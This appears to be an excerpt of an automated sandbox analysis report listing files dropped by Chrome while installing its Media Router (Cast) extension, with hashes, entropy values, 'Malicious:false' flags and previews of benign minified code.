                                                                                                                                                                SSDEEP:192:d2XprmNaHYkOkAFzrlR/jTcGIEaXV6c8TEKdl:WrT4uozrl/sXV6uml
                                                                                                                                                                MD5:494CE2ACB21A426E051C146E600E7564
                                                                                                                                                                SHA1:D045ECC2A69C963D5D34A148FE4A7939DE6A1322
                                                                                                                                                                SHA-256:A1053F9496ED7FA3C625C94347F07A5E760F514FD8EE142EC9EE64E86B9C063D
                                                                                                                                                                SHA-512:DE2C8498B55749B4D35CF2627E55271F7F09E4560FA16D7094EFB4085CF1E5FAE36F067AAC01AE120548C00DC8AA530EE96079B5CC3E322DF9FF8592799AEB3F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....".. },.. "1213957982723875920": {.. "message": "................".. },.. "128276876460319075": {.. "message": "....".. },.. "1428448869078126731": {.. "message": ".....".. },.. "1522140683318860351": {.. "message": "...........".. },.. "1550904064710828958": {.. "message": "..".. },.. "1636686747687494376": {.. "message": "..".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": ".... $START_LINK$Google Home ....$END_LINK$...... Chromecast ..$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8873
                                                                                                                                                                Entropy (8bit):5.783771260103677
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:RbOTFZn2gSNe3mp5m7B93y1nQ6Yrlyb6LdhdgtSpsB5+lbr:c7n7sKDS83br
                                                                                                                                                                MD5:2F5C87F7644CEEDFECACC84C5F577BDA
                                                                                                                                                                SHA1:5E395505617BBF7CFFDB5251C10D95B508C98A23
                                                                                                                                                                SHA-256:F129C3ECF7D97CC6926DD3AD306E6F4DB6DF15A2090A7B624320989070FEFF0D
                                                                                                                                                                SHA-512:9269D79ADC15ADB645D7DF118726C59F5750BFA659DC9812A7E7D9EE7A15BA18AF4B417A865A95934237EA085983D30EF1AC2593EB4EF7D0DDA9FB531283E48D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9hbS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZmxYTGNaVTNJSWstTnZiaDlMb0FDQl9lUDc0ODMtUmlkNXliYnQxczBRMCJ9LHsicGF0aCI6Il9sb2NhbGVzL2FyL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJKd3ZSZF9wQ1JYWEJtWXZRSTFpWVd3Uk1TRVh4QTNjVnRXV2F5amhYWVVFIn0seyJwYXRoIjoiX2xvY2FsZXMvYmcvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik5FVEw0bjRHWTdGTUVyQnNWVFVpTDFoTERfdGVBRVJOSkVhZk5HT1FUZ0EifSx7InBhdGgiOiJfbG9jYWxlcy9ibi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWWtEUkRMZktna3h5QXFpNS1YNjN3VWlDYU9DaTJ3ZDg5cHp4dnBmMlR5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJuUUVGbHpDY2Jzdm5oRlhEdDd2aVZhZnQ2NWlXZFExTkdWc29idEVxVmRnIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6InhaWk1DMlNaT2ZiUl91bHRRWXNtWEdWUGZBaEJfVjNIdHVSeGlQMlhwR0kifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWlBQdnFIMVBHaFIxZkh6Qzd
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\angular.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):609224
                                                                                                                                                                Entropy (8bit):5.410844677248803
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Uf6Dhzz3zA/hJNpwsswmlJp49tkhSZWZhPQM:PDhzD8/hJNhshlJp49tkhSZWZhPX
                                                                                                                                                                MD5:F1E52B350B1C324FF28EE4BCAD9FE22C
                                                                                                                                                                SHA1:AF775BA51D0607D3E2AD91CCBA1CB005DBA4669A
                                                                                                                                                                SHA-256:91744C4866BCE1BC77D3DF4D649DC7A0033EB4199D6A955ABA37C35DB570B93F
                                                                                                                                                                SHA-512:C22718D20198C79A233E9EAEA516DB70148D057B00DC50658F5433D5E2272975000D4ED7725BB7D068B31254EE73E696241914C1DF5AA34DF514110EBD6F7005
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: //third_party/javascript/angular/v1_6/angular.min.js./*. AngularJS v1.6.4-local+sha.617b36117. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.'use strict';(function(ia){'use strict';function Rf(a){if(fa(a))R(a.objectMaxDepth)&&(de.objectMaxDepth=fd(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return de}function fd(a){return Pa(a)&&0<a}function va(a){return function(){var b=arguments[0];var d="["+(a?a+":":"")+b+"] http://errors.angularjs.org/1.6.4-local+sha.617b36117/"+(a?a+"/":"")+b;for(b=1;b<arguments.length;b++){d=d+(1==b?"?":"&")+"p"+(b-1)+"=";var c=encodeURIComponent;var e=arguments[b];e="function"==typeof e?e.toString().replace(/ \{[\s\S]*$/,""):."undefined"==typeof e?"undefined":"string"!=typeof e?JSON.stringify(e):e;d+=c(e)}return Error(d)}}function ub(a){if(null==a||ac(a))return!1;if(oa(a)||na(a)||da&&a instanceof da)return!0;var b="length"in Object(a)&&a.length;return Pa(b)&&(0<=b&&(b-1 in a||a instanceof Array)||"function"===typeof a.item)}function I(a,b,d){
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\background_script.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2078
                                                                                                                                                                Entropy (8bit):5.171252146309821
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Z8vQaPi3U7en+enInMtQgQ+AlRRZGztGsI5OuYHLEtX+Qf1h:Z8vtime+eokD9GS2OfL8X+QT
                                                                                                                                                                MD5:6D5A8D09DD0DB2E9250D3D972BE7A816
                                                                                                                                                                SHA1:BF726E35085F750EA3EBD4BC5F64EE225C85B228
                                                                                                                                                                SHA-256:B4C0290948F887A978D2183BC7F959D1C522D3F752285A3547B57CBFC1023C28
                                                                                                                                                                SHA-512:512E1C406AF4F958371167520D5C5257AF4737E6DAB6EB29E17B37D2D013DF398616AE08DC786F257CBF9042FAFA7E078A28387CBA443DE017FB40E4786E4B00
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';fb("mr.TestProvider");var wx,dw,xx=fb("mr.Init"),Oaa=function(a){void 0!==a.use_views_dialog&&xx.info("Using the "+(a.use_views_dialog?"Views (Harmony)":"WebUI")+" dialog.");void 0!==a.enable_cast_sink_query&&xx.info("Native Cast MRP is "+(a.enable_cast_sink_query?"disabled":"enabled")+".");void 0!==a.use_mirroring_service&&xx.info("Native Mirroring Service is "+(a.use_mirroring_service?"enabled":"disabled")+".")};qs().init();wx=new Fb("MediaRouter.Provider.WakeDuration");dw=new qw;.var Paa=(new Promise(function(a,b){switch(window.location.host){case "enhhojjnijigcajfphajepfemndkmdlo":a();break;case "pkedcjkdefgpdelpbcmbmeomcjbeemfm":chrome.management.get("enhhojjnijigcajfphajepfemndkmdlo",function(c){chrome.runtime.lastError||!c.enabled?a():b(Error("Dev extension is enabled"))});break;default:b(Error("Unknown extension id"))}})).then(function(){return chrome.mojoPrivate&&chrome.mojoPrivate.requireAsync?new Promise(function(a){chrome.mojoPrivate.requireAsync("media_router_
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\cast_sender.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):49641
                                                                                                                                                                Entropy (8bit):5.3010524124405975
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:PYrOR1tFkgKVM6bCHt0y7lkB2FJaFTS98eq9LcRdkpi4ryHSBKqppEmarFO2wYy0:PYrOR8Fl6kB2FJqTS98eq9LcRdkpi4rG
                                                                                                                                                                MD5:C9118D2AAF192FA3D4591DF130818BC1
                                                                                                                                                                SHA1:8411614105F9DF0F515CBE930744A3B60865CB44
                                                                                                                                                                SHA-256:9B2378860D76167F1F2D3515A83F13B24069109EE248DD8F8A0ED83673A930FB
                                                                                                                                                                SHA-512:F3F350D629FA95D5937BCA72CA04090B3D161C03636301A0CAE36298ED1721B1AA0D7989B9F29B07C613A784640F9631B3921CF93D56117D3AF5ED550AF7E65D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:aa(a)}},ca="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},g;.if("function"==typeof Object.setPrototypeOf)g=Object.setPrototypeOf;else{var m;a:{var da={a:!0},ea={};try{ea.__proto__=da;m=ea.a;break a}catch(a){}m=!1}g=m?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}.var fa=g,n=function(a,b){a.prototype=ca(b.prototype);a.prototype.constructor=a;if(fa)fa(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.Jc=b.prototype},p=this||self,ha=function(){},ia
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\common.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40514
                                                                                                                                                                Entropy (8bit):5.430309801672184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:Ho+9YrfzFM2xfuNWEIX8MrjugAItDNOSsrLIXCxs/y0D:1YrrFLx6WEIX8CyBwNODw2s/yq
                                                                                                                                                                MD5:6B86C8D9D642840072947E7CEA4D6B6F
                                                                                                                                                                SHA1:152D0B70449F5FBD8159B2980D6DE8C0952070F0
                                                                                                                                                                SHA-256:21855FC22C9676242E1ECFAA9E609ED70D136E30BC3F297EFAD5702749FD264D
                                                                                                                                                                SHA-512:38C66349C9E51963D7D7DFFB9C2C66459BFAE2D4BCB0CA04178E25C30E6FED69F4D8277BFED2606144DBB0215938E0F7C4555196B90E08019AFBB8894974DD88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var k,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),fa=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.fa("Symbol",function(a){if(a)return a;var b=function(e,f){this.g=e;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=functi
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\feedback.css
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3116
                                                                                                                                                                Entropy (8bit):5.0201551881561635
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:31YB10fXdq14jTAu0mgs0gwa8J8LZmY1181Y5OGib210bGjKL1rT1hJ14DKtKUHo:nfX8udgaw7mL55cSuoKtHHxOA/x0n
                                                                                                                                                                MD5:D8EE20737329319BFA1ACBB0E6C219A6
                                                                                                                                                                SHA1:D24118D81990E1316CA809669ECB603724C6E7E2
                                                                                                                                                                SHA-256:A582FC20DBCAD1918000B690EB8F237EC14E5B836FD7F799C35702D88DBE6862
                                                                                                                                                                SHA-512:7633682BF161EB1EDE7D62AA9C5E65A727C030DBAA483FEC4F5948C5A5849EFA342A52260097358BF4EF02F07D0464C3356152ABBE4A5C534580960D80594AC9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: :root {. --paper-blue-500: rgb(33, 150, 243);. --paper-blue-500-dark: rgba(33, 150, 243, 0.87);. --paper-blue-500-light: rgba(33, 150, 243, 0.26);.};..body {. font-size: 12px;. height: inherit;.}..#description,.#required-legend {. margin-top: 22px;.}..#description,.#form-buttons,.#required-legend,.#title {. padding: 0 17px;.}...informative {. font-size: 13px;. line-height: 13px;.}..#feedback-confirmation {. width: initial;.}..#feedback-fine-log-warning {. color: rgb(219, 68, 55);. margin: 10px 0;.}..#feedback-type-toggle,..question {. padding: 16px 17px;.}..#form {. -webkit-padding-end: 24px;. -webkit-padding-start: 24px;. background-color: white;. color: rgba(0, 0, 0, 0.87);. box-shadow: 0 1px 4px 0 rgba(0, 0, 0, 0.37);. margin: -100px auto 48px auto;. padding: 34px 17px;. width: 720px;. z-index: 1;.}..#form-buttons {. flex-direction: row;. display: flex;. justify-content: flex-end;. margin-top: 34px;.}..#header {. margin-bottom: 22px;.}..#header-banner {.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\feedback.html
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15606
                                                                                                                                                                Entropy (8bit):4.340710080778977
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WGEiiDKFK5N+bVfifi5sdUemfOHT5MGTGhCBo5NmsAOZ0RsAOZYu24kJkcdFXOrO:WGESFKrsitdfGO6nrom6mcCswz4TLn
                                                                                                                                                                MD5:0EFADA4B2A95CC2D4AE00F794759D763
                                                                                                                                                                SHA1:FEC3BB7837BE805955601F8C211DC5BE1F16535D
                                                                                                                                                                SHA-256:8CB99506A2ED9BCC6E1A66E0F218524C91304B3EBFCA113D0FECBB3D80078D0D
                                                                                                                                                                SHA-512:7ADF9EA446F06C5BFB203CAE8E0CB97E230E7230D9EC7BEAB8B7F76AC8E9B9CF0FC7395C87D90836D7FDCA57E8F80FD9E0091807B3F902A37F67C69144E49616
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: <!DOCTYPE html>.<html ng-app="feedbackApp" ng-controller="FeedbackCtrl". ng-csp xmlns="http://www.w3.org/1999/xhtml" lang="top.language">.<head>. <title>. Chrome Media Router feedback. </title>. <link rel="stylesheet" type="text/css" href="feedback.css">. <link rel="stylesheet" type="text/css" href="material_css_min.css">. <script src="angular.js"></script>. <script type="text/javascript" src="common.js"></script>. <script type="text/javascript" src="feedback_script.js"></script>.</head>.<body>. <div id="header-banner"></div>. <div>. <div id="form">. <div id="header">. <div id="title">. <angular-message key="MEDIA_ROUTER_FEEDBACK_HEADER". desc="Header of the Media Router feedback page.">. Tell us what's happening with Google Cast.. </angular-message>. </div>. <div id="description" class="informative">. <angular-message key="MEDIA_ROUTER_FEEDBACK_FORM_DESCRIPTION". desc="Text to d
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\feedback_script.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):25282
                                                                                                                                                                Entropy (8bit):5.753244978977296
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:mVHpCozN1nyJ0kCFmgOC9ARzNohHunY4Fjw7sCyyXFvT010CJau6LKwqwW1cGLC:mVHpCozN1nyJ0kCFmgOC9ARzNohHunYx
                                                                                                                                                                MD5:F0254686411ED475F25E7CADF2C43C00
                                                                                                                                                                SHA1:553AA52F7C4E3CE4A046545AB6829B1C97227540
                                                                                                                                                                SHA-256:574F96B5295A809AABE848F7DB1661595A0CBEC580D83EA78CC786379AF7886F
                                                                                                                                                                SHA-512:5F1474439923B79E563F2D3FB9B1B4448BBB5DC702C26A7C118F430B6F5583ABC9611BB1B96BA230A2BDC9ED440A25700454D80F803501DCA37771513E7EE60A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var hh=function(a,b,c){a.timeOfStartCall=(new Date).getTime();var d=c||Ia,e=d.document,f=a.nonce||Ue(d);f&&!a.nonce&&(a.nonce=f);if("help"==a.flow){var g=Ja("document.location.href",d);!a.helpCenterContext&&g&&(a.helpCenterContext=g.substring(0,1200));g=!0;if(b&&JSON&&JSON.stringify){var h=JSON.stringify(b);(g=1200>=h.length)&&(a.psdJson=h)}g||(b={invalidPsd:!0})}b=[a,b,c];d.GOOGLE_FEEDBACK_START_ARGUMENTS=b;c=a.serverUri||"//www.google.com/tools/feedback";if(g=d.GOOGLE_FEEDBACK_START)g.apply(d,b);.else{d=c+"/load.js?";for(var m in a)b=a[m],null==b||Oa(b)||(d+=encodeURIComponent(m)+"="+encodeURIComponent(b)+"&");a=dg(Uf(e),"SCRIPT");f&&a.setAttribute("nonce",f);Ve(a,fg(d));e.body.appendChild(a)}};v("userfeedback.api.startFeedback",hh);var ih=function(){this.j=this.h=this.u=this.modelName=this.l=this.g=this.dd="";this.C=this.o=this.m=!1};var jh=chrome.i18n.getMessage("4163185390680253103"),kh=chrome.i18n.getMessage("492097680647953484"),lh=chrome.i18n.getMessage("2575016469
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\manifest.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2092
                                                                                                                                                                Entropy (8bit):5.317090883496623
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:QWaLGou01gC7CsbCypwQdmv7pej3hE/ao16JN8A3:DaLUgCWrdmTpDAN5
                                                                                                                                                                MD5:48A1759AE81A93444171ADAB438B247D
                                                                                                                                                                SHA1:362D1AC81C289CFE1C59F88CD7DF8C32B5C693E9
                                                                                                                                                                SHA-256:555A8069571CB8D82286CBFF6B9BE23B6EB49ACACBC5E7217DAECAD23D9DD570
                                                                                                                                                                SHA-512:C3402BAA4A6822CE78E234556F62CCC819321A22B37555BE10B74BDE2FC6ADC7C7C2C3F02AF92760C1A3BC64D4921FB7986A84481C68C40281F0779A2D183C6F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "background": {.. "persistent": false,.. "scripts": [ "common.js", "mirroring_common.js", "background_script.js" ].. },.. "content_security_policy": "default-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; script-src 'self' https://apis.google.com https://feedback.googleusercontent.com https://www.google.com https://www.gstatic.com; child-src https://accounts.google.com https://content.googleapis.com https://www.google.com; connect-src 'self' http://*:* https://*:*; font-src https://fonts.gstatic.com;",.. "default_locale": "en",.. "description": "Provider for discovery and services for mirroring of Chrome Media Router",.. "externally_connectable": {.. "ids": [ "idmofbkcelhplfjnmmdolenpigiiiecc", "ggedfkijiiammpnbdadhllnehapomdge", "njjegkblellcjnakomndbaloifhcoccg" ].. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDNTWJoPZ9bT32yKxuuVa9LSEYobjPoXCLX3dgsZ9djDrWKNikTECjdRe3/AFXb+v8jkmmtYQPnOgSYn06J/QodDlCIG6l470+gkOoobUM7f
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\material_css_min.css
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):322554
                                                                                                                                                                Entropy (8bit):5.071302554556422
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:5UhKq5pbUqJHPPXLdi6cv+lWUgkgRyrG24CszGR+QAQ4Vy3OSYec3eNk3ksSn+8o:52TFa
                                                                                                                                                                MD5:76EAA4368ED0E83F45B725727414D0E2
                                                                                                                                                                SHA1:CB3ABE758DD77E0AC48F9C9D23DB386E9E52E42E
                                                                                                                                                                SHA-256:3F94B4F2DDAE805F4863FE751B138CB77B24893E3EDE6822E72F0EE4624CD155
                                                                                                                                                                SHA-512:8835E1B06718C86D8AB690E700AAF61E47B8E3F6E64D943EC7D95CDB293499F47D5CE408440E0D636A62D580781D256C204CC3E10735D27E49B53A236A6A19B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*!. * AngularJS Material Design. * https://github.com/angular/material. * @license MIT. * v1.1.20. */body,html{height:100%;position:relative}body{margin:0;padding:0}[tabindex="-1"]:focus{outline:none}.inset{padding:10px}a.md-no-style,button.md-no-style{font-weight:400;background-color:inherit;text-align:left;border:none;padding:0;margin:0}button,input,select,textarea{vertical-align:baseline}button,html input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}button[disabled],html input[type=button][disabled],input[type=reset][disabled],input[type=submit][disabled]{cursor:default}textarea{vertical-align:top;overflow:auto}input[type=search]{-webkit-appearance:textfield;box-sizing:content-box;-webkit-box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}input:-webkit-autofill{text-shadow:none}.md-visually-hidden{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_cast_streaming.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36444
                                                                                                                                                                Entropy (8bit):5.305050936612732
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:zkatHT5iMVc2g2ga19kE/ZFqJeZm1CXaaFSYpXIKzidevGNIjAO8KxKI5kWiSl+o:H/xF1EW7DzVvjAO89SNO6VXG04E
                                                                                                                                                                MD5:63F087BB1FA9F4641C327B3B6973E439
                                                                                                                                                                SHA1:7115D9E0EEE14C336EF3D8B272675B6AFC39E45F
                                                                                                                                                                SHA-256:66E9A229F7E9E470B2421F0E1C218159AD51864CDD3C77997A6ECFEB6881B541
                                                                                                                                                                SHA-512:99694BE658E0D00A4BDECC45899C9DDA12295ABD38EBCD59569D5CBFBB97A41624FBB7FBD828863AAF06ED9449D10705917A3F175B4F359E9103BE0FE3A06284
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var Qaa={TAB:0,ln:1,jv:2},yx=function(){return new Bb("MediaRouter.CastStreaming.Session.Launch")},zx=function(){return new Hb("MediaRouter.CastStreaming.Session.Length")},Ax=function(a){Mb("MediaRouter.CastStreaming.Start.Success",a,Qaa)};var Bx=fb("mr.mirror.cast.LogUploader");function Cx(a,b,c){Dx("raw_events.log.gz",a,b,c);return b?"https://crash.corp.google.com/samples?reportid=&q="+encodeURIComponent("UserComments='"+b+"'"):""}.function Dx(a,b,c,d){if(0==b.size)Bx.info("Trying to upload an empty file to Crash"),d&&d(null);else{var e=new FormData;e.append("prod","Cast");e.append("ver",chrome.runtime.getManifest().version);e.append(a,b);c&&e.append("comments",c);kx("https://clients2.google.com/cr/report",function(f){f=f.target;var g=null;sx(f)?(g=ux(f),Bx.info("Upload to Crash succeeded: "+g)):Bx.info("Upload to Crash failed. HTTP status: "+f.za());d&&d(g)},"POST",e,void 0,3E4)}};var Ex=function(){this.g=0;Tm(this)},Gx=function(){Fx||(Fx=new Ex);return Fx},Raa=function
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_common.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):207556
                                                                                                                                                                Entropy (8bit):5.432854181645903
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:NxPjVMju5MLRdxCq11R3D0dK3qorEvw5MqJxM1qLFHNfBclvu45DM7UFuUmmfcCD:N5jVKu5MLRdxCq11R3D0dK3qorEvw5Ml
                                                                                                                                                                MD5:C642C9F61A3E11BDC31609BDB5420414
                                                                                                                                                                SHA1:9F4E2DC4487195B849A4898EE4962D6C54002AB5
                                                                                                                                                                SHA-256:92C610102B7172C80596F32D952D40C9379F8EDDA475A3896E8BE5DCA414A34B
                                                                                                                                                                SHA-512:8E910E71D20353D427B3E0901D90BDC72A05950F1D6AD0C2A569E76C0462B1941BAF28FD87BE95D9570E1B4558BCE090CB4B80D1B8635990781A2DF36AEF576F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 'use strict';var sj;var tj=chrome.i18n.getMessage("545449835455981095");v("mr.IssueSeverity",{MH:"fatal",bT:"warning",dM:"notification"});v("mr.IssueAction",{zH:"dismiss",pK:"learn_more"});var uj=function(a,b){this.sinkId=this.routeId=null;this.severity=b;this.isBlocking="fatal"==this.severity?!0:!1;this.title=a;this.message=null;this.defaultAction="dismiss";this.helpPageId=this.secondaryActions=null},wj=function(){var a=new uj(vj,"notification");a.helpPageId=6320939;a.defaultAction="learn_more";a.secondaryActions=["dismiss"];return a},xj=function(a,b){a.sinkId=b;return a};var yj=function(a,b){var c=this;this.g=void 0===b?null:b;this.promise=new Promise(function(d,e){var f=function(g){c.g=null;e(g)};c.h=f;a(function(g){c.g=null;d(g)},f)})};yj.prototype.cancel=function(a){this.h(a);if(this.g){var b=this.g;this.g=null;setTimeout(function(){return b(a)},0)}};var zj=function(a,b,c){c=void 0===c?null:c;return new yj(function(d,e){a.promise.then(function(f){if(b)try{d(b(f))}catch(g){e(g)}els
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\mirroring_hangouts.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):833635
                                                                                                                                                                Entropy (8bit):5.545662863836174
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:abcq20T9PVeWqHk1IHqPCznEui5vGQZg0JTztsV1VD:JqNT9PVeWkqPqEuUvGQZg0JTztsV1VD
                                                                                                                                                                MD5:D337E291B4377F8732F455CA32F89374
                                                                                                                                                                SHA1:3E25996EF17ABFF950AD146EFFBE1EDCE128AFF6
                                                                                                                                                                SHA-256:AEA84BB4D3C96D80B3F241A9AAFC7EDE5062BF809792FC4984E5571CA6FD217C
                                                                                                                                                                SHA-512:1AD47E406750933135B88FCD8CFBF004FE164862CF431C3E06515C4C16D7BD63E4E739F37033F3A3CEB0405F669B96CE6D539A732B7280692B718878DA437BD3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
